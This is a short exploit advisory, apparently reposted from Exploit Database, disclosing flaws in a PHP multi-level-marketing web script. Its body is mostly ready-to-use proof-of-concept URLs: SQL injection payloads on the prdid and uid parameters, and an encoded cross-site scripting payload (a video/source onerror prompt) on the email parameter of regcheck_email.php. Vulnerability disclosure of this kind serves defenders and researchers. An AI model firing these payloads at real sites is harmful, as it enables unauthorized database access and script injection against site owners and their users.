MLM (Multi Level Marketing) Script – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： 3spi0n
  日期： 2013-07-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27009/

• ##################################################################################
  _____ _ _ ______ 
   |__ \ | | | | (_)/ ____|
   | |__) |_____ _____ | |_ _| |_ _____ __ | (___ ______ 
   |_// _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ \___ \ / _ \/ __|
   | | \ \__/\ V / (_) | | |_| | |_| | (_) | | | |____) |__/ (__ 
   |_|\_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| |_____/ \___|\___|
  
  ##################################################################################																
  MLM (Multi Level Marketing) Script, Multiple Vulnerabilities
  Product Page: http://www.mlmscript.in/
  
  Author(Pentester): 3spi0n
  On Web: RevolutionSec.Com - GraySecure.Org
  On Social: Twitter.Com/eyyamgudeer
  ##################################################################################
  
  [1] SQL Injection Vulnerabilities on Demo Site
  
  [+] (productview.php, prdid Param)
  >>> http://server/product/version2/productview.php?prdid='1
  
  [+] (productview.php, uid param)
  >>> http://server/product/version2/profileview.php?uid='1
  
  [2] Xss (Cross Site Scripting) Vulnerability on Demo Site
  
  [+] (regcheck_email.php, email param)
  >>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E